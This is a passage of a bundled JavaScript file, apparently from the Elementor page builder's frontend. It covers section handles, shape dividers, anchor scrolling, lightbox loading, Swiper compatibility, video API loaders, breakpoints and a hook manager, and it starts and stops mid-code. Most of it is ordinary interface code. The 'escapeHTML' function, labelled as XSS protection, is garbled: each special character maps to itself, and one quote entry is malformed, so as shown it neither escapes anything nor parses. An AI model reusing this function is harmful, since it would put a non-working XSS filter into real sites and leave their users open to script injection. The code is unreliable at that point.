return this.$element[0] === document.querySelector('.elementor-edit-mode .elementor-top-section');
}
isOverflowHidden() {
return 'hidden' === this.$element.css('overflow');
}
getOffset() {
if ('body' === elementor.config.document.container) {
return this.$element.offset().top;
}
const $container = jQuery(elementor.config.document.container);
return this.$element.offset().top - $container.offset().top;
}
setHandlesPosition() {
const document = elementor.documents.getCurrent();
if (!document || !document.container.isEditable()) {
return;
}
const insideHandleClass = 'elementor-section--handles-inside',
$handlesElement = this.$element.find('> .elementor-element-overlay > .elementor-editor-section-settings');
if (elementor.settings.page.model.attributes.scroll_snap) {
this.$element.addClass(insideHandleClass);
return;
}
const isOverflowHidden = this.isOverflowHidden();
if (!isOverflowHidden && !this.isFirstSection()) {
return;
}
const offset = isOverflowHidden ? 0 : this.getOffset();
if (offset < 25) {
this.$element.addClass(insideHandleClass);
if (offset < -5) {
$handlesElement.css('top', -offset);
} else {
$handlesElement.css('top', '');
}
} else {
this.$element.removeClass(insideHandleClass);
}
}
onInit() {
if (!this.isActive()) {
return;
}
this.setHandlesPosition();
this.$element.on('mouseenter', this.setHandlesPosition.bind(this));
}
}
exports.default = HandlesPosition;
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/section/section.js":
/*!*************************************************************!*\
!*** ../assets/dev/js/frontend/handlers/section/section.js ***!
\*************************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
var _interopRequireDefault = __webpack_require__(/*! @babel/runtime/helpers/interopRequireDefault */ "../node_modules/@babel/runtime/helpers/interopRequireDefault.js");
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
var _backgroundSlideshow = _interopRequireDefault(__webpack_require__(/*! ../background-slideshow */ "../assets/dev/js/frontend/handlers/background-slideshow.js"));
var _backgroundVideo = _interopRequireDefault(__webpack_require__(/*! ./background-video */ "../assets/dev/js/frontend/handlers/section/background-video.js"));
var _handlesPosition = _interopRequireDefault(__webpack_require__(/*! ./handles-position */ "../assets/dev/js/frontend/handlers/section/handles-position.js"));
var _stretchedSection = _interopRequireDefault(__webpack_require__(/*! ./stretched-section */ "../assets/dev/js/frontend/handlers/section/stretched-section.js"));
var _shapes = _interopRequireDefault(__webpack_require__(/*! ./shapes */ "../assets/dev/js/frontend/handlers/section/shapes.js"));
var _default = [_stretchedSection.default, // Must run before BackgroundSlideshow to init the slideshow only after the stretch.
_backgroundSlideshow.default, _backgroundVideo.default, _handlesPosition.default, _shapes.default];
exports.default = _default;
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/section/shapes.js":
/*!************************************************************!*\
!*** ../assets/dev/js/frontend/handlers/section/shapes.js ***!
\************************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class Shapes extends elementorModules.frontend.handlers.Base {
getDefaultSettings() {
return {
selectors: {
container: '> .elementor-shape-%s'
},
svgURL: elementorFrontend.config.urls.assets + 'shapes/'
};
}
getDefaultElements() {
const elements = {},
selectors = this.getSettings('selectors');
elements.$topContainer = this.$element.find(selectors.container.replace('%s', 'top'));
elements.$bottomContainer = this.$element.find(selectors.container.replace('%s', 'bottom'));
return elements;
}
isActive() {
return elementorFrontend.isEditMode();
}
getSvgURL(shapeType, fileName) {
let svgURL = this.getSettings('svgURL') + fileName + '.svg';
if (elementor.config.additional_shapes && shapeType in elementor.config.additional_shapes) {
svgURL = elementor.config.additional_shapes[shapeType];
if (-1 < fileName.indexOf('-negative')) {
svgURL = svgURL.replace('.svg', '-negative.svg');
}
}
return svgURL;
}
buildSVG(side) {
const baseSettingKey = 'shape_divider_' + side,
shapeType = this.getElementSettings(baseSettingKey),
$svgContainer = this.elements['$' + side + 'Container'];
$svgContainer.attr('data-shape', shapeType);
if (!shapeType) {
$svgContainer.empty(); // Shape-divider set to 'none'
return;
}
let fileName = shapeType;
if (this.getElementSettings(baseSettingKey + '_negative')) {
fileName += '-negative';
}
const svgURL = this.getSvgURL(shapeType, fileName);
jQuery.get(svgURL, data => {
$svgContainer.empty().append(data.childNodes[0]);
});
this.setNegative(side);
}
setNegative(side) {
this.elements['$' + side + 'Container'].attr('data-negative', !!this.getElementSettings('shape_divider_' + side + '_negative'));
}
onInit(...args) {
if (!this.isActive(this.getSettings())) {
return;
}
super.onInit(...args);
['top', 'bottom'].forEach(side => {
if (this.getElementSettings('shape_divider_' + side)) {
this.buildSVG(side);
}
});
}
onElementChange(propertyName) {
const shapeChange = propertyName.match(/^shape_divider_(top|bottom)$/);
if (shapeChange) {
this.buildSVG(shapeChange[1]);
return;
}
const negativeChange = propertyName.match(/^shape_divider_(top|bottom)_negative$/);
if (negativeChange) {
this.buildSVG(negativeChange[1]);
this.setNegative(negativeChange[1]);
}
}
}
exports.default = Shapes;
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/section/stretched-section.js":
/*!***********************************************************************!*\
!*** ../assets/dev/js/frontend/handlers/section/stretched-section.js ***!
\***********************************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class StretchedSection extends elementorModules.frontend.handlers.Base {
bindEvents() {
const handlerID = this.getUniqueHandlerID();
elementorFrontend.addListenerOnce(handlerID, 'resize', this.stretch);
elementorFrontend.addListenerOnce(handlerID, 'sticky:stick', this.stretch, this.$element);
elementorFrontend.addListenerOnce(handlerID, 'sticky:unstick', this.stretch, this.$element);
if (elementorFrontend.isEditMode()) {
this.onKitChangeStretchContainerChange = this.onKitChangeStretchContainerChange.bind(this);
elementor.channels.editor.on('kit:change:stretchContainer', this.onKitChangeStretchContainerChange);
}
}
unbindEvents() {
elementorFrontend.removeListeners(this.getUniqueHandlerID(), 'resize', this.stretch);
if (elementorFrontend.isEditMode()) {
elementor.channels.editor.off('kit:change:stretchContainer', this.onKitChangeStretchContainerChange);
}
}
isActive(settings) {
return elementorFrontend.isEditMode() || settings.$element.hasClass('elementor-section-stretched');
}
initStretch() {
this.stretch = this.stretch.bind(this);
this.stretchElement = new elementorModules.frontend.tools.StretchElement({
element: this.$element,
selectors: {
container: this.getStretchContainer()
}
});
}
getStretchContainer() {
return elementorFrontend.getKitSettings('stretched_section_container') || window;
}
stretch() {
if (!this.getElementSettings('stretch_section')) {
return;
}
this.stretchElement.stretch();
}
onInit(...args) {
if (!this.isActive(this.getSettings())) {
return;
}
this.initStretch();
super.onInit(...args);
this.stretch();
}
onElementChange(propertyName) {
if ('stretch_section' === propertyName) {
if (this.getElementSettings('stretch_section')) {
this.stretch();
} else {
this.stretchElement.reset();
}
}
}
onKitChangeStretchContainerChange() {
this.stretchElement.setSettings('selectors.container', this.getStretchContainer());
this.stretch();
}
}
exports.default = StretchedSection;
/***/ }),
/***/ "../assets/dev/js/frontend/utils/anchors.js":
/*!**************************************************!*\
!*** ../assets/dev/js/frontend/utils/anchors.js ***!
\**************************************************/
/***/ ((module) => {
"use strict";
module.exports = elementorModules.ViewModule.extend({
getDefaultSettings: function () {
return {
scrollDuration: 500,
selectors: {
links: 'a[href*="#"]',
targets: '.elementor-element, .elementor-menu-anchor',
scrollable: 'html, body'
}
};
},
getDefaultElements: function () {
var $ = jQuery,
selectors = this.getSettings('selectors');
return {
$scrollable: $(selectors.scrollable)
};
},
bindEvents: function () {
elementorFrontend.elements.$document.on('click', this.getSettings('selectors.links'), this.handleAnchorLinks);
},
handleAnchorLinks: function (event) {
var clickedLink = event.currentTarget,
isSamePathname = location.pathname === clickedLink.pathname,
isSameHostname = location.hostname === clickedLink.hostname,
$anchor;
if (!isSameHostname || !isSamePathname || clickedLink.hash.length < 2) {
return;
}
try {
$anchor = jQuery(clickedLink.hash).filter(this.getSettings('selectors.targets'));
} catch (e) {
return;
}
if (!$anchor.length) {
return;
}
var scrollTop = $anchor.offset().top,
$wpAdminBar = elementorFrontend.elements.$wpAdminBar,
$activeStickies = jQuery('.elementor-section.elementor-sticky--active:visible'),
maxStickyHeight = 0;
if ($wpAdminBar.length > 0) {
scrollTop -= $wpAdminBar.height();
} // Offset height of tallest sticky
if ($activeStickies.length > 0) {
maxStickyHeight = Math.max.apply(null, $activeStickies.map(function () {
return jQuery(this).outerHeight();
}).get());
scrollTop -= maxStickyHeight;
}
event.preventDefault();
scrollTop = elementorFrontend.hooks.applyFilters('frontend/handlers/menu_anchor/scroll_top_distance', scrollTop);
this.elements.$scrollable.animate({
scrollTop: scrollTop
}, this.getSettings('scrollDuration'), 'linear');
},
onInit: function () {
elementorModules.ViewModule.prototype.onInit.apply(this, arguments);
this.bindEvents();
}
});
/***/ }),
/***/ "../assets/dev/js/frontend/utils/assets-loader.js":
/*!********************************************************!*\
!*** ../assets/dev/js/frontend/utils/assets-loader.js ***!
\********************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class AssetsLoader {
getScriptElement(src) {
const scriptElement = document.createElement('script');
scriptElement.src = src;
return scriptElement;
}
getStyleElement(src) {
const styleElement = document.createElement('link');
styleElement.rel = 'stylesheet';
styleElement.href = src;
return styleElement;
}
load(type, key) {
const assetData = AssetsLoader.assets[type][key];
if (!assetData.loader) {
assetData.loader = new Promise(resolve => {
const element = 'style' === type ? this.getStyleElement(assetData.src) : this.getScriptElement(assetData.src);
element.onload = () => resolve(true);
const parent = 'head' === assetData.parent ? assetData.parent : 'body';
document[parent].appendChild(element);
});
}
return assetData.loader;
}
}
exports.default = AssetsLoader;
const fileSuffix = elementorFrontendConfig.environmentMode.isScriptDebug ? '' : '.min';
AssetsLoader.assets = {
script: {
dialog: {
src: `${elementorFrontendConfig.urls.assets}lib/dialog/dialog${fileSuffix}.js?ver=4.8.1`
},
'share-link': {
src: `${elementorFrontendConfig.urls.assets}lib/share-link/share-link${fileSuffix}.js?ver=${elementorFrontendConfig.version}`
},
swiper: {
src: `${elementorFrontendConfig.urls.assets}lib/swiper/swiper${fileSuffix}.js?ver=5.3.6`
}
},
style: {}
};
/***/ }),
/***/ "../assets/dev/js/frontend/utils/lightbox/lightbox-manager.js":
/*!********************************************************************!*\
!*** ../assets/dev/js/frontend/utils/lightbox/lightbox-manager.js ***!
\********************************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class LightboxManager extends elementorModules.ViewModule {
static getLightbox() {
const lightboxPromise = new Promise(resolveLightbox => {
__webpack_require__.e(/*! import() | lightbox */ "lightbox").then(__webpack_require__.t.bind(__webpack_require__, /*! elementor-frontend/utils/lightbox/lightbox */ "../assets/dev/js/frontend/utils/lightbox/lightbox.js", 23)).then(({
default: LightboxModule
}) => resolveLightbox(new LightboxModule()));
}),
dialogPromise = elementorFrontend.utils.assetsLoader.load('script', 'dialog'),
shareLinkPromise = elementorFrontend.utils.assetsLoader.load('script', 'share-link');
return Promise.all([lightboxPromise, dialogPromise, shareLinkPromise]).then(() => lightboxPromise);
}
getDefaultSettings() {
return {
selectors: {
links: 'a, [data-elementor-lightbox]'
}
};
}
getDefaultElements() {
return {
$links: jQuery(this.getSettings('selectors.links'))
};
}
isLightboxLink(element) {
// Check for lowercase `a` to make sure it works also for links inside SVGs.
if ('a' === element.tagName.toLowerCase() && (element.hasAttribute('download') || !/^[^?]+\.(png|jpe?g|gif|svg|webp)(\?.*)?$/i.test(element.href)) && !element.dataset.elementorLightboxVideo) {
return false;
}
const generalOpenInLightbox = elementorFrontend.getKitSettings('global_image_lightbox'),
currentLinkOpenInLightbox = element.dataset.elementorOpenLightbox;
return 'yes' === currentLinkOpenInLightbox || generalOpenInLightbox && 'no' !== currentLinkOpenInLightbox;
}
async onLinkClick(event) {
const element = event.currentTarget,
$target = jQuery(event.target),
editMode = elementorFrontend.isEditMode(),
isColorPickingMode = editMode && elementor.$previewContents.find('body').hasClass('elementor-editor__ui-state__color-picker'),
isClickInsideElementor = !!$target.closest('.elementor-edit-area').length;
if (!this.isLightboxLink(element)) {
if (editMode && isClickInsideElementor) {
event.preventDefault();
}
return;
}
event.preventDefault();
if (editMode && !elementor.getPreferences('lightbox_in_editor')) {
return;
} // Disable lightbox on color picking mode.
if (isColorPickingMode) {
return;
}
const lightbox = this.isOptimizedAssetsLoading() ? await LightboxManager.getLightbox() : elementorFrontend.utils.lightbox;
lightbox.createLightbox(element);
}
isOptimizedAssetsLoading() {
return elementorFrontend.config.experimentalFeatures.e_optimized_assets_loading;
}
bindEvents() {
elementorFrontend.elements.$document.on('click', this.getSettings('selectors.links'), event => this.onLinkClick(event));
}
onInit(...args) {
super.onInit(...args);
if (!this.isOptimizedAssetsLoading() || elementorFrontend.isEditMode()) {
return;
} // Detecting lightbox links on init will reduce the time of waiting to the lightbox to be display on slow connections.
this.elements.$links.each((index, element) => {
if (this.isLightboxLink(element)) {
LightboxManager.getLightbox(); // Breaking the iteration when the library loading has already been triggered.
return false;
}
});
}
}
exports.default = LightboxManager;
/***/ }),
/***/ "../assets/dev/js/frontend/utils/swiper-bc.js":
/*!****************************************************!*\
!*** ../assets/dev/js/frontend/utils/swiper-bc.js ***!
\****************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class SwiperBC {
constructor(container, config) {
this.config = config;
if (this.config.breakpoints) {
// The config is passed as a param to allow adjustConfig to be called outside of this wrapper
this.config = this.adjustConfig(config);
} // In case of a legacy behaviour the constructor should return a new Swiper instance instead of a Promise.
if (config.legacy) {
return this.createSwiperInstance(container, this.config);
}
return new Promise(resolve => {
if (!elementorFrontend.config.experimentalFeatures.e_optimized_assets_loading) {
return resolve(this.createSwiperInstance(container, this.config));
}
elementorFrontend.utils.assetsLoader.load('script', 'swiper').then(() => resolve(this.createSwiperInstance(container, this.config)));
});
}
createSwiperInstance(container, config) {
// The condition should run only once to prevent an additional overwrite of the SwiperSource.
if (!SwiperBC.isSwiperLoaded && elementorFrontend.config.experimentalFeatures.e_optimized_assets_loading) {
SwiperSource = window.Swiper;
SwiperBC.isSwiperLoaded = true; // Once the SwiperSource has the Swiper lib function, we need to overwrite window.Swiper with the legacySwiper class.
legacySwiper();
}
SwiperSource.prototype.adjustConfig = this.adjustConfig;
return new SwiperSource(container, config);
} // Backwards compatibility for Elementor Pro <2.9.0 (old Swiper version - <5.0.0)
// In Swiper 5.0.0 and up, breakpoints changed from acting as max-width to acting as min-width
adjustConfig(config) {
// Only reverse the breakpoints if the handle param has been defined
if (!config.handleElementorBreakpoints) {
return config;
}
const elementorBreakpoints = elementorFrontend.config.responsive.activeBreakpoints,
elementorBreakpointValues = elementorFrontend.breakpoints.getBreakpointValues();
Object.keys(config.breakpoints).forEach(configBPKey => {
const configBPKeyInt = parseInt(configBPKey);
let breakpointToUpdate; // The `configBPKeyInt + 1` is a BC Fix for Elementor Pro Carousels from 2.8.0-2.8.3 used with Elementor >= 2.9.0
if (configBPKeyInt === elementorBreakpoints.mobile.value || configBPKeyInt + 1 === elementorBreakpoints.mobile.value) {
// This handles the mobile breakpoint. Elementor's default sm breakpoint is never actually used,
// so the mobile breakpoint (md) needs to be handled separately and set to the 0 breakpoint (xs)
breakpointToUpdate = 0;
} else if (elementorBreakpoints.widescreen && (configBPKeyInt === elementorBreakpoints.widescreen.value || configBPKeyInt + 1 === elementorBreakpoints.widescreen.value)) {
// Widescreen is a min-width breakpoint. Since in Swiper >5.0 the breakpoint system is min-width based,
// the value we pass to the Swiper instance in this case is the breakpoint from the user, unchanged.
breakpointToUpdate = configBPKeyInt;
} else {
// Find the index of the current config breakpoint in the Elementor Breakpoints array
const currentBPIndexInElementorBPs = elementorBreakpointValues.findIndex(elementorBP => {
// BC Fix for Elementor Pro Carousels from 2.8.0-2.8.3 used with Elementor >= 2.9.0
return configBPKeyInt === elementorBP || configBPKeyInt + 1 === elementorBP;
}); // For all other Swiper config breakpoints, move them one breakpoint down on the breakpoint list,
// according to the array of Elementor's global breakpoints
breakpointToUpdate = elementorBreakpointValues[currentBPIndexInElementorBPs - 1];
}
config.breakpoints[breakpointToUpdate] = config.breakpoints[configBPKey]; // Then reset the settings in the original breakpoint key to the default values
config.breakpoints[configBPKey] = {
slidesPerView: config.slidesPerView,
slidesPerGroup: config.slidesPerGroup ? config.slidesPerGroup : 1
};
});
return config;
}
} // The following code is needed to support Pro version < 3.1.0.
exports.default = SwiperBC;
SwiperBC.isSwiperLoaded = false; // In the legacy behavior, window.Swiper was a class that returns an instance of the Swiper lib function after config adjustments.
function legacySwiper() {
window.Swiper = class {
constructor(container, config) {
config.legacy = true;
return new SwiperBC(container, config);
}
};
}
let SwiperSource = window.Swiper; // In case that the Swiper lib exists (meaning not in optimized mode) we overwrite the window.Swiper with a class that supports legacy behavior.
if (SwiperSource) {
legacySwiper();
}
/***/ }),
/***/ "../assets/dev/js/frontend/utils/url-actions.js":
/*!******************************************************!*\
!*** ../assets/dev/js/frontend/utils/url-actions.js ***!
\******************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class _default extends elementorModules.ViewModule {
getDefaultSettings() {
return {
selectors: {
links: 'a[href^="%23elementor-action"], a[href^="#elementor-action"]'
}
};
}
bindEvents() {
elementorFrontend.elements.$document.on('click', this.getSettings('selectors.links'), this.runLinkAction.bind(this));
}
initActions() {
this.actions = {
lightbox: async settings => {
const lightbox = await elementorFrontend.utils.lightbox;
if (settings.id) {
lightbox.openSlideshow(settings.id, settings.url);
} else {
lightbox.showModal(settings);
}
}
};
}
addAction(name, callback) {
this.actions[name] = callback;
}
runAction(url, ...restArgs) {
url = decodeURIComponent(url);
const actionMatch = url.match(/action=(.+?)&/),
settingsMatch = url.match(/settings=(.+)/);
if (!actionMatch) {
return;
}
const action = this.actions[actionMatch[1]];
if (!action) {
return;
}
let settings = {};
if (settingsMatch) {
settings = JSON.parse(atob(settingsMatch[1]));
}
action(settings, ...restArgs);
}
runLinkAction(event) {
event.preventDefault();
this.runAction(jQuery(event.currentTarget).attr('href'), event);
}
runHashAction() {
if (location.hash) {
this.runAction(location.hash);
}
}
createActionHash(action, settings) {
// We need to encode the hash tag (#) here, in order to support share links for a variety of providers
return encodeURIComponent(`#elementor-action:action=${action}&settings=${btoa(JSON.stringify(settings))}`);
}
onInit() {
super.onInit();
this.initActions();
elementorFrontend.on('components:init', this.runHashAction.bind(this));
}
}
exports.default = _default;
/***/ }),
/***/ "../assets/dev/js/frontend/utils/utils.js":
/*!************************************************!*\
!*** ../assets/dev/js/frontend/utils/utils.js ***!
\************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.escapeHTML = void 0;
// Escape HTML special chars to prevent XSS.
const escapeHTML = str => {
const specialChars = {
'&': '&',
'<': '<',
'>': '>',
"'": ''',
'"': '"'
};
return str.replace(/[&<>'"]/g, tag => specialChars[tag] || tag);
};
exports.escapeHTML = escapeHTML;
/***/ }),
/***/ "../assets/dev/js/frontend/utils/video-api/base-loader.js":
/*!****************************************************************!*\
!*** ../assets/dev/js/frontend/utils/video-api/base-loader.js ***!
\****************************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class BaseLoader extends elementorModules.ViewModule {
getDefaultSettings() {
return {
isInserted: false,
selectors: {
firstScript: 'script:first'
}
};
}
getDefaultElements() {
return {
$firstScript: jQuery(this.getSettings('selectors.firstScript'))
};
}
insertAPI() {
this.elements.$firstScript.before(jQuery('<script>', {
src: this.getApiURL()
}));
this.setSettings('isInserted', true);
}
getVideoIDFromURL(url) {
const videoIDParts = url.match(this.getURLRegex());
return videoIDParts && videoIDParts[1];
}
onApiReady(callback) {
if (!this.getSettings('isInserted')) {
this.insertAPI();
}
if (this.isApiLoaded()) {
callback(this.getApiObject());
} else {
// If not ready check again by timeout..
setTimeout(() => {
this.onApiReady(callback);
}, 350);
}
}
getAutoplayURL(videoURL) {
return videoURL.replace('&autoplay=0', '') + '&autoplay=1';
}
}
exports.default = BaseLoader;
/***/ }),
/***/ "../assets/dev/js/frontend/utils/video-api/vimeo-loader.js":
/*!*****************************************************************!*\
!*** ../assets/dev/js/frontend/utils/video-api/vimeo-loader.js ***!
\*****************************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
var _interopRequireDefault = __webpack_require__(/*! @babel/runtime/helpers/interopRequireDefault */ "../node_modules/@babel/runtime/helpers/interopRequireDefault.js");
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
var _baseLoader = _interopRequireDefault(__webpack_require__(/*! ./base-loader */ "../assets/dev/js/frontend/utils/video-api/base-loader.js"));
class VimeoLoader extends _baseLoader.default {
getApiURL() {
return 'https://player.vimeo.com/api/player.js';
}
getURLRegex() {
return /^(?:https?:\/\/)?(?:www|player\.)?(?:vimeo\.com\/)?(?:video\/|external\/)?(\d+)([^.?&#"'>]?)/;
}
isApiLoaded() {
return window.Vimeo;
}
getApiObject() {
return Vimeo;
}
getAutoplayURL(videoURL) {
videoURL = super.getAutoplayURL(videoURL); // Vimeo requires the '#t=' param to be last in the URL.
const timeMatch = videoURL.match(/#t=[^&]*/);
return videoURL.replace(timeMatch[0], '') + timeMatch;
}
}
exports.default = VimeoLoader;
/***/ }),
/***/ "../assets/dev/js/frontend/utils/video-api/youtube-loader.js":
/*!*******************************************************************!*\
!*** ../assets/dev/js/frontend/utils/video-api/youtube-loader.js ***!
\*******************************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
var _interopRequireDefault = __webpack_require__(/*! @babel/runtime/helpers/interopRequireDefault */ "../node_modules/@babel/runtime/helpers/interopRequireDefault.js");
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
var _baseLoader = _interopRequireDefault(__webpack_require__(/*! ./base-loader */ "../assets/dev/js/frontend/utils/video-api/base-loader.js"));
class YoutubeLoader extends _baseLoader.default {
getApiURL() {
return 'https://www.youtube.com/iframe_api';
}
getURLRegex() {
return /^(?:https?:\/\/)?(?:www\.)?(?:m\.)?(?:youtu\.be\/|youtube\.com\/(?:(?:watch)?\?(?:.*&)?vi?=|(?:embed|v|vi|user)\/))([^?&"'>]+)/;
}
isApiLoaded() {
return window.YT && YT.loaded;
}
getApiObject() {
return YT;
}
}
exports.default = YoutubeLoader;
/***/ }),
/***/ "../assets/dev/js/public-path.js":
/*!***************************************!*\
!*** ../assets/dev/js/public-path.js ***!
\***************************************/
/***/ ((__unused_webpack_module, __unused_webpack_exports, __webpack_require__) => {
"use strict";
/* eslint-disable camelcase */
__webpack_require__.p = elementorFrontendConfig.urls.assets + 'js/';
/***/ }),
/***/ "../assets/dev/js/utils/breakpoints.js":
/*!*********************************************!*\
!*** ../assets/dev/js/utils/breakpoints.js ***!
\*********************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
/**
* Breakpoints
*
* This utility class contains helper functions relating to Elementor's breakpoints system.
*
* @since 3.4.0
*/
class Breakpoints extends elementorModules.Module {
constructor(responsiveConfig) {
super(); // The passed config is either `elementor.config.responsive` or `elementorFrontend.config.responsive`
this.responsiveConfig = responsiveConfig;
}
/**
* Get Active Breakpoints List
*
* Returns a flat array containing the active breakpoints/devices. By default, it returns the li
* the list ordered from smallest to largest breakpoint. If `true` is passed as a parameter, it reverses the order.
*
* @since 3.4.0
*
* @param {Object} args
*/
getActiveBreakpointsList(args = {}) {
const defaultArgs = {
largeToSmall: false,
withDesktop: false
};
args = { ...defaultArgs,
...args
};
const breakpointKeys = Object.keys(this.responsiveConfig.activeBreakpoints);
if (args.withDesktop) {
// If there is an active 'widescreen' breakpoint, insert the artificial 'desktop' device below it.
const widescreenIndex = breakpointKeys.indexOf('widescreen'),
indexToInsertDesktopDevice = -1 === widescreenIndex ? breakpointKeys.length : breakpointKeys.length - 1;
breakpointKeys.splice(indexToInsertDesktopDevice, 0, 'desktop');
}
if (args.largeToSmall) {
breakpointKeys.reverse();
}
return breakpointKeys;
}
/**
* Get Active Breakpoint Values
*
* Returns a flat array containing the list of active breakpoint values, from smallest to largest.
*
* @since 3.4.0
*/
getBreakpointValues() {
const {
activeBreakpoints
} = this.responsiveConfig,
breakpointValues = [];
Object.values(activeBreakpoints).forEach(breakpointConfig => {
breakpointValues.push(breakpointConfig.value);
});
return breakpointValues;
}
/**
* Get Desktop Previous Device Key
*
* Returns the key of the device directly under desktop (can be 'tablet', 'tablet_extra', 'laptop').
*
* @since 3.4.0
*
* @returns {string}
*/
getDesktopPreviousDeviceKey() {
let desktopPreviousDevice = '';
const {
activeBreakpoints
} = this.responsiveConfig,
breakpointKeys = Object.keys(activeBreakpoints),
numOfDevices = breakpointKeys.length;
if ('min' === activeBreakpoints[breakpointKeys[numOfDevices - 1]].direction) {
// If the widescreen breakpoint is active, the device that's previous to desktop is the last one before
// widescreen.
desktopPreviousDevice = breakpointKeys[numOfDevices - 2];
} else {
// If the widescreen breakpoint isn't active, we just take the last device returned by the config.
desktopPreviousDevice = breakpointKeys[numOfDevices - 1];
}
return desktopPreviousDevice;
}
/**
* Get Device Minimum Breakpoint
*
* Returns the minimum point in the device's display range. For each device, the minimum point of its display range
* is the max point of the device below it + 1px. For example, if the active devices are mobile, tablet,
* and desktop, and the mobile breakpoint is 767px, the minimum display point for tablet devices is 768px.
*
* @since 3.4.0
*
* @returns {number|*}
*/
getDesktopMinPoint() {
const {
activeBreakpoints
} = this.responsiveConfig,
desktopPreviousDevice = this.getDesktopPreviousDeviceKey();
return activeBreakpoints[desktopPreviousDevice].value + 1;
}
/**
* Get Device Minimum Breakpoint
*
* Returns the minimum point in the device's display range. For each device, the minimum point of its display range
* is the max point of the device below it + 1px. For example, if the active devices are mobile, tablet,
* and desktop, and the mobile breakpoint is 767px, the minimum display point for tablet devices is 768px.
*
* @since 3.4.0
*
* @param device
* @returns {number|*}
*/
getDeviceMinBreakpoint(device) {
if ('desktop' === device) {
return this.getDesktopMinPoint();
}
const {
activeBreakpoints
} = this.responsiveConfig,
breakpointNames = Object.keys(activeBreakpoints);
let minBreakpoint;
if (breakpointNames[0] === device) {
// For the lowest breakpoint, the min point is always 320.
minBreakpoint = 320;
} else if ('widescreen' === device) {
// Widescreen only has a minimum point. In this case, the breakpoint
// value in the Breakpoints config is itself the device min point.
if (activeBreakpoints[device]) {
minBreakpoint = activeBreakpoints[device].value;
} else {
// If the widescreen breakpoint does not exist in the active breakpoints config (for example, in the
// case this method runs as the breakpoint is being added), get the value from the full config.
minBreakpoint = this.responsiveConfig.breakpoints.widescreen;
}
} else {
const deviceNameIndex = breakpointNames.indexOf(device),
previousIndex = deviceNameIndex - 1;
minBreakpoint = activeBreakpoints[breakpointNames[previousIndex]].value + 1;
}
return minBreakpoint;
}
/**
* Get Active Match Regex
*
* Returns a regular expression containing all active breakpoints prefixed with an underscore.
*
* @returns {RegExp}
*/
getActiveMatchRegex() {
return new RegExp(this.getActiveBreakpointsList().map(device => '_' + device).join('|') + '$');
}
}
exports.default = Breakpoints;
/***/ }),
/***/ "../assets/dev/js/utils/hooks.js":
/*!***************************************!*\
!*** ../assets/dev/js/utils/hooks.js ***!
\***************************************/
/***/ ((module) => {
"use strict";
/**
* Handles managing all events for whatever you plug it into. Priorities for hooks are based on lowest to highest in
* that, lowest priority hooks are fired first.
*/
var EventManager = function () {
var slice = Array.prototype.slice,
MethodsAvailable;
/**
* Contains the hooks that get registered with this EventManager. The array for storage utilizes a "flat"
* object literal such that looking up the hook utilizes the native object literal hash.
*/
var STORAGE = {
actions: {},
filters: {}
};
/**
* Removes the specified hook by resetting the value of it.
*
* @param type Type of hook, either 'actions' or 'filters'
* @param hook The hook (namespace.identifier) to remove
*
* @private
*/
function _removeHook(type, hook, callback, context) {
var handlers, handler, i;
if (!STORAGE[type][hook]) {
return;
}
if (!callback) {
STORAGE[type][hook] = [];
} else {
handlers = STORAGE[type][hook];
if (!context) {
for (i = handlers.length; i--;) {
if (handlers[i].callback === callback) {
handlers.splice(i, 1);
}
}
} else {
for (i = handlers.length; i--;) {
handler = handlers[i];
if (handler.callback === callback && handler.context === context) {
handlers.splice(i, 1);
}
}
}
}
}
/**
* Use an insert sort for keeping our hooks organized based on priority. This function is ridiculously faster
* than bubble sort, etc: http://jsperf.com/javascript-sort
*
* @param hooks The custom array containing all of the appropriate hooks to perform an insert sort on.
* @private
*/
function _hookInsertSort(hooks) {
var tmpHook, j, prevHook;
for (var i = 1, len = hooks.length; i < len; i++) {
tmpHook = hooks[i];
j = i;
while ((prevHook = hooks[j - 1]) && prevHook.priority > tmpHook.priority) {
hooks[j] = hooks[j - 1];
--j;
}
hooks[j] = tmpHook;
}
return hooks;
}
/**
* Adds the hook to the appropriate storage container
*
* @param type 'actions' or 'filters'
* @param hook The hook (namespace.identifier) to add to our event manager
* @param callback The function that will be called when the hook is executed.
* @param priority The priority of this hook. Must be an integer.
* @param [context] A value to be used for this
* @private
*/
function _addHook(type, hook, callback, priority, context) {
var hookObject = {
callback: callback,
priority: priority,
context: context
}; // Utilize 'prop itself' : http://jsperf.com/hasownproperty-vs-in-vs-undefined/19
var hooks = STORAGE[type][hook];
if (hooks) {
// TEMP FIX BUG
var hasSameCallback = false;
jQuery.each(hooks, function () {
if (this.callback === callback) {
hasSameCallback = true;
return false;
}
});
if (hasSameCallback) {
return;
} // END TEMP FIX BUG
hooks.push(hookObject);
hooks = _hookInsertSort(hooks);
} else {
hooks = [hookObject];
}
STORAGE[type][hook] = hooks;
}
/**
